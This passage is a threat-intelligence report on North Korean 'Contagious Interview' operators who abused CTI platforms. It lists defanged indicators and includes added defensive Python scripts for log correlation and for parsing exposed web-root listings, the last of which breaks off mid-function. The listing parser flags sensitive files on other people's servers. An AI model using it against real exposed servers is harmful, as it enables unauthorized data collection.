
Contagious Interview | North Korean Threat Actors Reveal Plans and Ops by Abusing Cyber Intel Platforms

Executive Summary

  • North Korea-aligned threat actors actively monitor cyber threat intelligence to detect infrastructure exposure and scout for new assets. This analysis focuses on the abuse of cyber intelligence platforms by the actors behind the Contagious Interview campaign cluster employing the ClickFix social engineering technique.
  • They operate in coordinated teams with real-time collaboration, likely using Slack and multiple intelligence sources such as Validin, VirusTotal, and Maltrail.
  • Although aware their infrastructure is detectable, they make only limited changes to reduce detection and disruption risk, while rapidly deploying new infrastructure in response to service provider takedowns.
  • This indicates a strategic focus on continuously replacing disrupted infrastructure with new assets to sustain operations and high victim engagement.
  • Factors such as decentralized command and competitive internal incentives may limit the threat actors’ ability to consistently protect existing infrastructure at scale.
  • SentinelLABS’ analysis suggests that the threat actors are effective at engaging targets; there were over 230 victims between January and March 2025, with the actual number likely being significantly higher.
  • In partnership with SentinelLABS and Validin, Reuters provides further coverage of the human dimension of this threat, exploring victim engagement methods and their personal impact.

Overview

In collaboration with the internet intelligence platform Validin, SentinelLABS has been tracking activity on the platform which we attribute with high confidence to North Korean threat actors involved in the Contagious Interview campaign cluster. This activity, which took place between March and June 2025, involved the threat actors examining cyber threat intelligence (CTI) information related to their infrastructure. Our unique visibility has provided valuable insights into their operational practices, internal coordination, infrastructure management and deployment, and victimology.

SentinelLABS continuously tracks North Korean-aligned threat actors, including their persistent interest in cyber threat intelligence. As part of SentinelLABS’ broader efforts to identify and disrupt North Korean operations in collaboration with partner organizations, SentinelLABS and Validin conducted a joint investigation, combining our threat intelligence expertise with Validin’s visibility into the threat actors’ activities on their platform, to better understand these activities and provide actionable intelligence supporting defensive actions.

SentinelLABS and Validin observed an intensive and coordinated effort by Contagious Interview threat actors to register and use Validin community access accounts within approximately 24 hours after Validin published a blog post on 11 March 2025. The post discusses the infrastructure of Lazarus, a suspected North Korean APT umbrella cluster associated with Contagious Interview activities. Validin’s community access portal provides free access to infrastructure intelligence information.

The threat actors used Google Gmail addresses that we had already been tracking as Contagious Interview artifacts at the time of registration. Although Validin blocked the accounts shortly after registration, we observed the threat actors persisting in their efforts to use Validin by creating accounts at later dates. At that point, we intentionally kept one account active over the long term to monitor and gather intelligence on their activities.

We observed that the Contagious Interview threat actors engaged in coordinated activity and likely operated in teams to investigate threat intelligence related to their infrastructure and to monitor for signs of detection. Indicators suggest they used multiple indicators of compromise (IOC) repositories and CTI platforms, including Validin, VirusTotal, and Maltrail. We also identified indicators of real-time teamwork, including possible use of the Slack platform to coordinate their investigations.

Despite thoroughly examining threat intelligence and identifying artifacts that can be used to discover their infrastructure, the threat actors did not implement systematic, large-scale changes to make it harder to detect, thereby reducing its exposure to discovery and disruption. Instead, we observed only sporadic, limited-scale changes targeting specific artifacts used to identify Contagious Interview infrastructure, while the threat actors rapidly deployed new infrastructure in response to service provider takedowns.

This may reflect a focus on investing resources to maintain operational readiness and sustain the campaign’s high volume of victim engagement by deploying new infrastructure rather than undertaking broad modifications to protect existing infrastructure. Based on log files unintentionally exposed on several Contagious Interview servers, we identified over 230 individuals affected during the period from January to March 2025, though the actual number is likely much higher.

Given the continuous success of their campaigns in engaging targets, it may be more pragmatic and efficient for the threat actors to deploy new infrastructure rather than maintain existing assets. Potential internal factors, such as decentralized command structures or operational resource constraints, may restrict their capacity to rapidly implement coordinated changes. Moreover, competitive pressures stemming from North Korea’s annual revenue quotas for cyber teams likely incentivize operatives to make isolated adjustments to the infrastructure under their control in order to protect their own assets and outperform colleagues, rather than participate in centrally coordinated, large-scale updates.

The threat actors also used Validin to scout and evaluate new infrastructure before acquisition, likely aiming to avoid assets previously flagged as malicious, which would increase detection risk and reduce operational effectiveness once deployed. Following acquisition, they continued to monitor their assets for signs of detection throughout their lifecycle. We were closely monitoring Contagious Interview infrastructure during its acquisition and deployment, which revealed repeated OPSEC failures, suggesting a lack of consistent operational security controls during the infrastructure setup phase.

Background | Contagious Interview and ClickFix

First used in 2023 to label a campaign targeting job seekers, the term Contagious Interview has since also been used in other senses, including to refer to an APT group assessed to be a subset of the North Korean umbrella group Lazarus.

In this post, we use Contagious Interview to refer to a cluster of campaigns, variants of the 2023 campaign, that target job applicants using diverse social engineering tactics to trick targets into executing malware.

Contagious Interview activities predominantly target individuals active in the cryptocurrency industry, aiming to gain access to their systems for various purposes, including intelligence collection and the theft of cryptocurrency assets. This supports North Korea’s efforts in evading sanctions and generating illicit revenue for financing its projects, including missile programmes.

Contagious Interview campaigns have been typically associated with the umbrella threat cluster Lazarus. DTEX Systems has attributed these campaigns to a group referred to as Gwisin Gang, which likely emerged from an IT organization whose subordination within the North Korean state apparatus is still subject to assessment.

Recent Contagious Interview campaigns, also referred to as ClickFake Interview, involve a social engineering technique known as ClickFix. We assess that the threat actors whose activities are discussed in this post are involved in these campaigns.

ClickFix typically proceeds as follows. A targeted job seeker receives an invitation to participate in a job application process, directing them to a lure website where they are prompted to complete a skill assessment. During the assessment, the applicant encounters a fabricated error message, such as a camera access issue. They are then instructed to copy and paste command lines, often involving utilities like curl, to download and execute a supposed update from a separate malware distribution server, unknowingly deploying malware in the process. This technique is discussed in more detail in previous research.

Account Registrations | Initial Activities

The threat actors started creating Validin community accounts on 12 March 2025 at 22:44:11 UTC, an activity which spanned a relatively short interval of approximately 15 minutes, suggesting a concentrated and coordinated approach. We present below the email addresses used for account registrations as well as the IP addresses from which the registrations were conducted. We attribute this activity to Contagious Interview threat actors based on multiple indicators.

Email Address                    | IP Address
jimmr6587[@]gmail.com            | 38.170.181[.]10
excellentreporter321[@]gmail.com | 194.33.45[.]162
rockstar96054[@]gmail.com        | 96.62.127[.]126
richardkdavis45[@]gmail.com      | 45.86.208[.]162
fairdev610[@]gmail.com           | 70.39.70[.]194
marvel714jm[@]gmail.com          | 77.247.126[.]189
montessantiago9712[@]gmail.com   | 38.170.181[.]10
hundredup2023[@]gmail.com        | 70.32.3[.]15
huzqur023[@]gmail.com            | 89.19.58[.]51

A significant portion of the IP addresses used for registration, such as 194.33.45[.]162, 70.39.70[.]194, 70.32.3[.]15, 38.170.181[.]10, and 45.86.208[.]162, have been associated with Astrill VPN, a VPN service popular among North Korean threat clusters.

Additionally, even before the account registrations, SentinelLABS and Validin were already tracking the email addresses fairdev610[@]gmail.com, richardkdavis45[@]gmail.com, rockstar96054[@]gmail.com, excellentreporter321[@]gmail.com, and hundredup2023[@]gmail.com as Contagious Interview artifacts. We found these addresses in unintentionally exposed JavaScript files (Node.js applications) on Contagious Interview ClickFix malware distribution servers.

We have been tracking these Node.js applications under the ContagiousDrop moniker since their initial exposure. Typically implemented as app.js files, the applications distribute malware to targeted individuals and notify the threat actors via email about victim engagement. This engagement includes information submission to Contagious Interview lure websites and the execution of commands, such as curl, as directed by the threat actors as part of the ClickFix social engineering tactic. A ContagiousDrop sample is highlighted in previous research on Contagious Interview activity published in April 2025. These applications will be discussed in greater detail later in this blog post.

Moreover, some email addresses have been used for registering Contagious Interview domains pointing to lure websites. For example, marvel714jm[@]gmail.com and jimmr6587[@]gmail.com have been used to register the paxos-video-interview[.]com and skill-share[.]org domains, respectively.

Finally, some email addresses were used to register Validin accounts from IP addresses that were also used to register or log in to accounts with other email addresses we attribute with high confidence to Contagious Interview. For example, the account montessantiago9712[@]gmail.com was registered from the IP address 38.170.181[.]10, the same as jimmr6587[@]gmail.com.

Approximately 15 minutes after the first observed account registration, Validin blocked the Contagious Interview accounts and subsequently prevented further community registrations originating from known Astrill VPN IP addresses or using Gmail accounts.

Account Registrations | Further Activities

After likely realizing that their access to Validin had been blocked, Contagious Interview threat actors attempted to register community accounts again on 25 March 2025 (13 days after the initial registration activity) and 26 April 2025. This time, they also used non-Gmail email addresses, most likely in response to Validin blocking Gmail-based registrations: info[@]versusx[.]us and invite[@]quiz-nest[.]com. We present below the email addresses used for Validin account registrations, along with the date, time, and originating IP addresses of these registrations.

Email Address            | Date (UTC) | Time (UTC) | IP Address
info[@]versusx[.]us      | 2025-03-25 | 13:33:01   | 181.59.180[.]84
mvsolution9[@]gmail.com  | 2025-04-26 | 16:48:54   | 181.215.9[.]29
invite[@]quiz-nest[.]com | 2025-04-26 | 16:51:29   | 181.215.9[.]29

The domain registration records for versusx[.]us include the email address brooksliam534[@]gmail.com, which has also been used to register several Contagious Interview domains discussed in previous research, such as willotalent[.]us and nvidia-release[.]us. Additionally, indicators suggest that the brooksliam534[@]gmail.com account has been involved in publishing malicious npm (Node Package Manager) packages (cors-app and cors-parser) as part of a software supply chain campaign attributed to Contagious Interview threat actors.

The liambrooksman persona (brooksliam534[@]gmail.com) tracked as maintainer of cors-app and cors-parser

We observed the registration of invite[@]quiz-nest[.]com approximately two minutes after the threat actors attempted to register mvsolution9[@]gmail.com. The registration of mvsolution9[@]gmail.com failed due to measures Validin implemented following the March 2025 account registration activities. Both actions originated from the same IP address, 181.215.9[.]29, suggesting the involvement of a single operator.

mvsolution9[@]gmail.com has been used to register two Contagious Interview domains: evalassesso[.]com, which Sekoia has also attributed to Contagious Interview, and speakure[.]com. The quiz-nest[.]com website, at least up to 24 May 2025, was implemented in a manner typical of Contagious Interview lure websites.

We also observed login attempts on 9 May 2025 using the excellentreporter321[@]gmail.com and marvel714jm[@]gmail.com accounts, which had been blocked by Validin in March 2025.

The threat actors’ shift to using non-Gmail addresses, along with their continuous attempts to bypass Validin’s access controls, highlights their adaptability and persistent interest in Validin data. Recognizing their persistence in obtaining community access, we intentionally kept only the info[@]versusx[.]us account active to monitor subsequent activity, determine their objectives, and gather further intelligence. Since then, the Contagious Interview threat actors have continued attempting to register new Validin accounts through the time of writing this post.

Account Registrations | Personas

In accordance with Validin’s policy for community accounts, the Contagious Interview actors completed registration forms requesting information such as full name, affiliation, and reason for registration.

Account                          | Full Name                      | Affiliation    | Reason
excellentreporter321[@]gmail.com | Andress Victor Pabon Carrascal | DAG            | Find My Platform.
fairdev610[@]gmail.com           | Fair Dev                       | Talents Vision | Reference
hundredup2023[@]gmail.com        | Thomas Mitchell                | Baymax         | to find domain
huzqur023[@]gmail.com            | Hamza                          | Starlink       | I will use this for phishing check
info[@]versusx[.]us              | Noraida                        | Versusx        | Research
invite[@]quiz-nest[.]com         | Anika Larkin                   | Quiz Nest      | Google
jimmr6587[@]gmail.com            | jimmr                          | Individual     | Github
marvel714jm[@]gmail.com          | Mar Vel                        | Paxos          | Valisin
montessantiago9712[@]gmail.com   | Santiago Montes                | Personal       | Virus Checker
mvsolution9[@]gmail.com          | Anika Larkin                   | Test           | Ggle
richardkdavis45[@]gmail.com      | Richard Davis                  | CreatDao       | /
rockstar96054[@]gmail.com        | Rock Lee                       | FWW            | Googling

The threat actors used a diverse range of names, from generic handles like jimmr to pop-culture references such as Rock Lee (a character from the Japanese anime series Naruto), Mar Vel (likely referring to Mar-Vell, a Captain Marvel character from Marvel Comics), and Santiago Montes (the main protagonist of the animated television series Santiago of the Seas), as well as more elaborate, seemingly legitimate full names like Andress Victor Pabon Carrascal. The reuse of the name Anika Larkin for two different accounts, invite[@]quiz-nest[.]com and mvsolution9[@]gmail.com, combined with both accounts being registered from the same IP address (181.215.9[.]29) within approximately two minutes, suggests the involvement of a single individual.

Some affiliations correspond to fake hiring platforms operated by Contagious Interview. For example, Quiz Nest aligns with the domain quiz-nest[.]com, while Paxos corresponds to domains such as paxos-video-interview[.]com and paxosassessments[.]com. The account marvel714jm[@]gmail.com, which used the Paxos affiliation, was also used to register the domain paxos-video-interview[.]com. This suggests the actors leveraged their own infrastructure and fabricated brands to create a more convincing facade of legitimacy.

In addition to these fake platforms, the threat actors also used names of legitimate, well-known companies such as Starlink, as well as vague descriptors like Individual or Personal.

Some of the stated reasons for registration provide direct insight into the threat actors’ primary objective: investigating threat intelligence information related to their infrastructure. For example, pretexts such as Research, To find domain, and Find My Platform indicate their interest in exploring Validin’s data.

Validin Use | Activity Across Multiple Platforms

The majority of accounts began using the Validin platform immediately after registration. In total, we observed 57 unique search terms across all categories supported by the platform, including domain names, hashes, URLs, web metadata, keywords, and IP addresses.

The threat actors did not search for any IOCs reported in Validin’s blog post, which we suspect triggered their initial interest in the platform. Therefore, we assess the post only brought Validin to their attention, after which they integrated Validin into a broader workflow for investigating threat intelligence related to their operations by leveraging multiple sources.

We observed indicators suggesting that the threat actors used additional IOC repositories and platforms alongside Validin to conduct comprehensive investigations. These included VirusTotal and the apt_lazarus.txt file, which is part of the Maltrail project and publicly available on GitHub. This file is regularly updated with domain names, IP addresses, and URLs attributed to the Lazarus umbrella APT cluster, as well as sources providing attribution information or context, such as social media, blog posts, and other threat intelligence platforms (including VirusTotal and Validin). VirusTotal is a malware analysis service and threat intelligence platform that aggregates detection results, reputation assessments, and contextual information for files, URLs, domains, and IP addresses from a wide range of detection engines, third-party tools, and its user community.

The very first search term used by the threat actors was the keyword TalentCheck, entered on 12 March 2025 at 22:44:40 UTC. TalentCheck is the title of multiple Contagious Interview websites, including skillcheck[.]pro, talentcheck[.]pro, and vidassesspro[.]com. The keyword was first published as an artifact identifying Contagious Interview websites approximately one day earlier by Maltrail in apt_lazarus.txt, on 11 March 2025 at 11:18:22 UTC. This suggests that the threat actors likely used Validin to investigate what additional information the platform could provide based on the TalentCheck keyword they first observed in apt_lazarus.txt.

TalentCheck in apt_lazarus.txt

Most of the search terms the threat actors used in Validin had been published exclusively in apt_lazarus.txt at the time of the search and were queried shortly after their appearance in the file, sometimes within less than an hour. This supports our assessment that the Contagious Interview actors closely monitored apt_lazarus.txt and used Validin to gather further details and contextual information.

In addition to Maltrail, we suspect that the Contagious Interview threat actors also use VirusTotal, or monitor what information about their infrastructure and malware is available on the platform, in conjunction with Validin. For example, the account richardkdavis45[@]gmail.com queried Validin for the URL https[://]robinhood[.]evalvidz[.]com/invite/fZ6j8A2k on 12 March 2025 at 22:59:20 UTC, just a few minutes after the exact same URL was first submitted to VirusTotal at 22:54:24 UTC.

Based on log files, we were able to reconstruct the exact navigation paths of the Contagious Interview threat actors within Validin. We observed a strong interest in external references that provide attribution information for specific search terms, which Validin displays in the Reputation Factors panel on the search results page. For most of the domains they searched, the threat actors visited every available external reference, demonstrating a determined effort to conduct thorough CTI investigations by gathering information from multiple sources.

Reconstructed navigation path of the jimmr6587[@]gmail.com account

Validin Use | Team Collaboration

We observed multiple accounts searching for the same terms within a very short time frame, indicating a coordinated and collaborative effort involving multiple individuals. In addition, we identified strong indicators that the threat actors were using Slack, a messaging platform commonly used for team communication and collaboration, to coordinate their activities.

When investigating patterns of account activity and search behavior using Validin log data, we observed that the jimmr6587[@]gmail.com account was the first to search for the domain webcamfixer[.]online on 12 March 2025 at 22:54:19 UTC, followed by excellentreporter321[@]gmail.com (22:55:17 UTC), rockstar96054[@]gmail.com (22:55:25 UTC), richardkdavis45[@]gmail.com (22:55:43 UTC), and fairdev610[@]gmail.com (22:55:55 UTC).

Our cross-examination of web server log data revealed that the search by jimmr6587[@]gmail.com was followed by requests to Validin from Slack Robots for the same URL generated by the search (/detail?type=dom&find=webcamfixer[.]online). Slack Robots retrieve web content when a user posts a URL in a channel or direct message, displaying summary information such as the page title, meta description, and a preview image.

These Slack Bot requests were followed by requests to the same URL from the IP addresses from which the accounts excellentreporter321[@]gmail.com, rockstar96054[@]gmail.com, richardkdavis45[@]gmail.com, and fairdev610[@]gmail.com had logged in. The timing of these requests aligns with each account’s respective search for webcamfixer[.]online as recorded in Validin logs.

Web server log data

This suggests that the individual operating the jimmr6587[@]gmail.com account searched for webcamfixer[.]online in Validin, pasted the resulting URL into Slack, and that the individuals behind the other accounts subsequently clicked on the shared link in quick succession.
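The log pattern described above (one account's search, a fetch of the same URL by Slack's link unfurler, then several other IPs opening that URL within seconds) can be hunted for mechanically. The following is an added example written for this page, not Validin's or SentinelLABS' tooling. It assumes combined-format web server logs, assumes that Slack's unfurler announces itself with a User-Agent containing "Slackbot-LinkExpanding" (confirm against your own logs), and uses constructed log lines with documentation-range IP addresses and a placeholder domain rather than Validin's real data.

```python
"""Spot the "one analyst searched, pasted the link into Slack, teammates
clicked" pattern in web server logs.

Added example, not Validin's or SentinelLABS' code. Assumptions:
- combined log format (IP, timestamp, request line, status, size, referer, UA);
- Slack's link unfurler identifies itself with a User-Agent containing
  "Slackbot-LinkExpanding" (assumed; confirm against your own logs);
- the log lines below are constructed (documentation-range IPs, placeholder
  domain), not taken from Validin's logs.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
UNFURL_UA_MARKER = "Slackbot-LinkExpanding"

SEARCH = "/detail?type=dom&find=lure-example.invalid"
SAMPLE_LOG = [
    f'198.51.100.10 - - [12/Mar/2025:22:54:19 +0000] "GET {SEARCH} HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'203.0.113.5 - - [12/Mar/2025:22:54:31 +0000] "GET {SEARCH} HTTP/1.1" 200 5120 "-" '
    '"Slackbot-LinkExpanding 1.0 (+https://api.slack.com/robots)"',
    f'198.51.100.21 - - [12/Mar/2025:22:55:17 +0000] "GET {SEARCH} HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'198.51.100.22 - - [12/Mar/2025:22:55:25 +0000] "GET {SEARCH} HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'198.51.100.23 - - [12/Mar/2025:22:55:43 +0000] "GET {SEARCH} HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # the sharer reloads the same page: must not be counted as a follower
    f'198.51.100.10 - - [12/Mar/2025:22:56:02 +0000] "GET {SEARCH} HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # unrelated search with no unfurl: must not produce a cluster
    '198.51.100.99 - - [12/Mar/2025:22:55:50 +0000] "GET /detail?type=dom&find=other.invalid HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_shared_link_clusters(lines, window=timedelta(minutes=5), min_followers=2):
    """For every unfurl fetch of a path, return the IP that requested that path
    just before it (the presumed sharer) and the distinct other IPs that
    requested it within `window` afterwards (the presumed click-throughs)."""
    by_path = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            by_path[rec["path"]].append(rec)

    clusters = []
    for path, recs in by_path.items():
        recs.sort(key=lambda r: r["ts"])
        humans = [r for r in recs if UNFURL_UA_MARKER not in r["ua"]]
        for bot in (r for r in recs if UNFURL_UA_MARKER in r["ua"]):
            before = [r for r in humans if bot["ts"] - window <= r["ts"] < bot["ts"]]
            if not before:
                continue  # unfurl with no preceding human request: link came from elsewhere
            sharer = before[-1]["ip"]
            followers = []
            for r in humans:
                if bot["ts"] < r["ts"] <= bot["ts"] + window and r["ip"] != sharer \
                        and r["ip"] not in followers:
                    followers.append(r["ip"])
            if len(followers) >= min_followers:
                clusters.append({"path": path, "sharer_ip": sharer,
                                 "unfurl_at": bot["ts"], "follower_ips": followers})
    return clusters


if __name__ == "__main__":
    for c in find_shared_link_clusters(SAMPLE_LOG):
        print(f"{c['unfurl_at']:%Y-%m-%d %H:%M:%S} {c['path']}")
        print(f"  shared by {c['sharer_ip']}, then opened by {', '.join(c['follower_ips'])}")
```

The sharer is taken to be the last non-bot request for the path before the unfurl; on a busy platform you would additionally join on the authenticated session rather than the IP alone, since VPN exit nodes are shared.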

Validin Use | Limited Infrastructure Changes

Despite thoroughly investigating CTI information and identifying artifacts that could be used to discover their infrastructure, we did not observe any systematic or widespread actions by the Contagious Interview threat actors to make their infrastructure more difficult to discover and to protect it against detection and disruption. We observed only sporadic changes of limited scale that did not significantly reduce the infrastructure’s visibility to defenders and threat researchers.

For example, after searching in Validin for the keyword SkillMaster, which is the title of multiple Contagious Interview websites, the threat actors changed the title of only one site, skillmasteryhub[.]us, from SkillMaster to SkillUp a few hours after the search. This change was not applied to other websites with the same title, such as VidHireHub[.]com.

Website title change on 13 March 2025, as seen in Validin

Many of the Contagious Interview domains that the threat actors searched for in Validin were taken down by their respective registrars shortly after the search activity. Others may have been voluntarily deactivated by the threat actors themselves, likely to avoid seizure or further investigation once they had confirmed that the domains were exposed. For example, the A DNS record for the domain careerquestion[.]com was removed just a few hours after the threat actors searched for it in Validin and confirmed its association with their operation.

The lack of systematic changes to their infrastructure, despite the threat actors’ thorough examination of CTI information, suggests several possible explanations.

Given the continuous success of the campaign in engaging job applicants, the threat actors may be prioritizing maintaining operational readiness and meeting their objectives by rapidly deploying new assets to replace disrupted infrastructure, rather than undertaking large-scale targeted changes. We observed a high rate of new infrastructure deployment by the Contagious Interview threat actors alongside losses of existing infrastructure due to actions by service providers, which supports this assessment.

There may be internal limitations, such as a lack of a central authoritative command structure or resource constraints affecting their ability to modify infrastructure rapidly and at scale. Additionally, the North Korean regime sets annual earnings quotas for cyber teams, requiring them to self-fund while meeting revenue targets. These quotas likely incentivize operatives to continually seek new income sources, fostering intense competition within teams. As a result, individuals managing only portions of the Contagious Interview infrastructure may make limited changes aimed at evading detection of the infrastructure they oversee, thereby gaining advantages over colleagues, rather than engaging in coordinated, large-scale modifications.

Validin Use | New Infrastructure And OPSEC Failures

The activity patterns of the info[@]versusx[.]us account on Validin, which we intentionally kept active over the long term, suggest that the threat actors used the platform not only to monitor for signs of detection related to their existing infrastructure, but also:

  • To scout and evaluate new infrastructure prior to purchase, highly likely to determine whether it had been previously reported as malicious. This helps the threat actors avoid acquiring assets already labeled as malicious, which would increase the risk of detection and reduce the effectiveness of their operations once deployed.
  • To monitor newly acquired infrastructure throughout its lifecycle for any indicators of detection.

For instance, on 25 March 2025, we observed the info[@]versusx[.]us account searching for the domain names hiringassessment[.]net, hiringassessment[.]com, hireassessment[.]com, easyjobinterview[.]org, and screenquestion[.]org. All of these domains were available for purchase at the time. These names align with the recruitment-related themes typically used in Contagious Interview activities.

The info[@]versusx[.]us account also searched for multiple domains around the time they were purchased and continued monitoring them for signs of detection after deploying web content. One example is skillquestions[.]com, which was first queried on 25 March 2025 at 17:33:34 UTC, just minutes before it was registered at 17:41:14 UTC. Additional searches occurred shortly before content was deployed on 23 April 2025, and continued periodically until 6 May 2025. According to Validin data, the skillquestions[.]com website remained operational until at least 13 May 2025 at 20:44:27 UTC.
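Both behaviours described in this post, querying an indicator shortly after it appears in apt_lazarus.txt or on VirusTotal (the TalentCheck and robinhood[.]evalvidz[.]com cases above) and querying a domain minutes before registering it (skillquestions[.]com), reduce to one analytic: the signed time lag between a platform query and the nearest external event for the same indicator. The following is an added example, not Validin's or SentinelLABS' tooling. The event and query timestamps for TalentCheck, the robinhood[.]evalvidz[.]com URL and skillquestions[.]com are the ones stated in this post; the query-log row layout, the "unknown" account for the TalentCheck search and the time of the hiringassessment[.]net query are constructed for illustration.

```python
"""Correlate CTI-platform queries with external events about the same
indicator: publication in a public feed, first VirusTotal submission, or
registration of the domain.

Added example, not Validin's or SentinelLABS' code. Event timestamps for
TalentCheck, the robinhood URL and skillquestions[.]com are those stated in
the post; the query-log layout, the "unknown" account and the
hiringassessment[.]net query time are constructed.
"""
from datetime import datetime, timedelta, timezone

FEED_KINDS = {"maltrail_apt_lazarus", "virustotal_first_submission", "blog_post"}


def ts(s):
    """Parse 'YYYY-MM-DD HH:MM:SS' as a UTC datetime."""
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)


ROBINHOOD_URL = "https[://]robinhood[.]evalvidz[.]com/invite/fZ6j8A2k"

# Platform query log: who searched for what, and when (constructed rows).
QUERIES = [
    {"account": "unknown", "term": "TalentCheck", "ts": ts("2025-03-12 22:44:40")},
    {"account": "richardkdavis45", "term": ROBINHOOD_URL, "ts": ts("2025-03-12 22:59:20")},
    {"account": "info@versusx.us", "term": "skillquestions[.]com", "ts": ts("2025-03-25 17:33:34")},
    # constructed time: the post only gives the date for this search
    {"account": "info@versusx.us", "term": "hiringassessment[.]net", "ts": ts("2025-03-25 17:30:00")},
]

# External events per indicator: list of (kind, time).
EVENTS = {
    "TalentCheck": [("maltrail_apt_lazarus", ts("2025-03-11 11:18:22"))],
    ROBINHOOD_URL: [("virustotal_first_submission", ts("2025-03-12 22:54:24"))],
    "skillquestions[.]com": [("domain_registered", ts("2025-03-25 17:41:14"))],
}


def classify_queries(queries, events, follow_up_window=timedelta(hours=48)):
    """Attach to each query the nearest known event for the same indicator,
    the signed lag (query time minus event time) and a verdict:
      pre_registration_scouting - domain queried before it was registered
      follow_up_on_publication  - queried within follow_up_window after it
                                  appeared in a feed, on VT or in a blog post
      uncorrelated              - an event exists but neither rule applies
      no_known_event            - nothing to compare against
    """
    out = []
    for q in queries:
        candidates = events.get(q["term"], [])
        if not candidates:
            out.append({**q, "event_kind": None, "lag": None, "verdict": "no_known_event"})
            continue
        kind, ev_ts = min(candidates, key=lambda e: abs(q["ts"] - e[1]))
        lag = q["ts"] - ev_ts
        if kind == "domain_registered" and lag < timedelta(0):
            verdict = "pre_registration_scouting"
        elif kind in FEED_KINDS and timedelta(0) <= lag <= follow_up_window:
            verdict = "follow_up_on_publication"
        else:
            verdict = "uncorrelated"
        out.append({**q, "event_kind": kind, "lag": lag, "verdict": verdict})
    return out


def summarize(results):
    """Count verdicts per account; accounts that only scout stand out."""
    summary = {}
    for r in results:
        per_account = summary.setdefault(r["account"], {})
        per_account[r["verdict"]] = per_account.get(r["verdict"], 0) + 1
    return summary


def fmt_lag(lag):
    """Render a timedelta as +HH:MM:SS / -HH:MM:SS."""
    sign = "-" if lag < timedelta(0) else "+"
    h, rem = divmod(int(abs(lag).total_seconds()), 3600)
    m, s = divmod(rem, 60)
    return f"{sign}{h:02d}:{m:02d}:{s:02d}"


if __name__ == "__main__":
    results = classify_queries(QUERIES, EVENTS)
    for r in results:
        lag = fmt_lag(r["lag"]) if r["lag"] is not None else "n/a"
        print(f"{r['account']:<18} {r['verdict']:<26} lag={lag:<10} {r['term']}")
    print(summarize(results))
```

The 48-hour follow-up window is deliberately wide: the post notes lags ranging from a few minutes (the VirusTotal case) to about a day and a half (TalentCheck). A negative lag against a registration event is the interesting signal regardless of window, because nobody but the future registrant has a reason to look up an unregistered name.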

Our continuous monitoring of the planning, acquisition, and deployment of new Contagious Interview infrastructure allowed us to identify OPSEC mistakes made by the threat actors throughout the process. We observed multiple instances of such errors, including the unintended exposure of files and directory contents, which indicate poor OPSEC practices during infrastructure deployment and provide further insight into their operations.

For example, api.release-drivers[.]online was exposing its web root directory, the files it contained, and their associated modification timestamps. This included error logs from a Node.js application stored in /home/relefmwz/api.release-drivers[.]online/, indicating that the threat actors used the username relefmwz. The exposed timestamps provide insight into when the Contagious Interview operators deployed content to the server, allowing us to reconstruct their activity timeline.

Exposed web root directory of api.release-drivers[.]online
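Turning an exposed directory listing into a deployment timeline, as described above, is mostly parsing and grouping. The following is an added example written for this page, not SentinelLABS' tooling. It assumes the server returns an Apache mod_autoindex style listing (an anchor per file followed by a "YYYY-MM-DD HH:MM" modification time); the post does not say which web server the actors used. The listing below is constructed and is not the real api.release-drivers[.]online page.

```python
"""Reconstruct a deployment timeline from an exposed web-root directory listing.

Added example, not SentinelLABS' tooling. Assumes an Apache mod_autoindex
style listing (anchor followed by a 'YYYY-MM-DD HH:MM' modification time);
the listing below is constructed, not the real api.release-drivers[.]online page.
"""
import re
from datetime import datetime, timedelta

SAMPLE_LISTING = """<html><head><title>Index of /</title></head><body>
<h1>Index of /</h1>
<pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a>  <a href="?C=M;O=A">Last modified</a>  <a href="?C=S;O=A">Size</a><hr>
<img src="/icons/back.gif" alt="[PARENTDIR]"> <a href="/">Parent Directory</a>                       -
<img src="/icons/text.gif" alt="[TXT]"> <a href="app.js">app.js</a>                         2025-03-25 17:55   12K
<img src="/icons/text.gif" alt="[TXT]"> <a href="package.json">package.json</a>             2025-03-25 17:58  1.1K
<img src="/icons/text.gif" alt="[TXT]"> <a href="error.log">error.log</a>                   2025-04-23 09:15   40K
<img src="/icons/text.gif" alt="[TXT]"> <a href="client_ips_start.json">client_ips_start.json</a> 2025-04-23 09:20  8.0K
<hr></pre></body></html>"""

# An anchor whose href is not a sort link ("?C=...") or the parent ("/..."),
# followed by the first 'YYYY-MM-DD HH:MM' timestamp after it.
ENTRY_RE = re.compile(r'<a href="([^"?/][^"]*)">[^<]*</a>.*?(\d{4}-\d{2}-\d{2} \d{2}:\d{2})', re.S)


def is_sensitive(name):
    """Files worth pulling first: application code, logs, data dumps and
    JSON records other than npm manifests."""
    lower = name.lower()
    if lower in {"app.js", ".env", ".git", "error.log"}:
        return True
    if lower.endswith((".log", ".bak", ".sql", ".sqlite", ".db")):
        return True
    return lower.endswith(".json") and not lower.startswith("package")


def parse_listing(html):
    """Return entries sorted by modification time: name, is_dir, mtime, sensitive."""
    entries = []
    for name, mtime in ENTRY_RE.findall(html):
        clean = name.rstrip("/")
        entries.append({
            "name": clean,
            "is_dir": name.endswith("/"),
            "mtime": datetime.strptime(mtime, "%Y-%m-%d %H:%M"),
            "sensitive": is_sensitive(clean),
        })
    entries.sort(key=lambda e: (e["mtime"], e["name"]))
    return entries


def deployment_sessions(entries, gap=timedelta(hours=6)):
    """Group time-sorted entries into operator sessions: a silence longer than
    `gap` between consecutive modification times starts a new session."""
    sessions = []
    for e in entries:
        if sessions and e["mtime"] - sessions[-1][-1]["mtime"] <= gap:
            sessions[-1].append(e)
        else:
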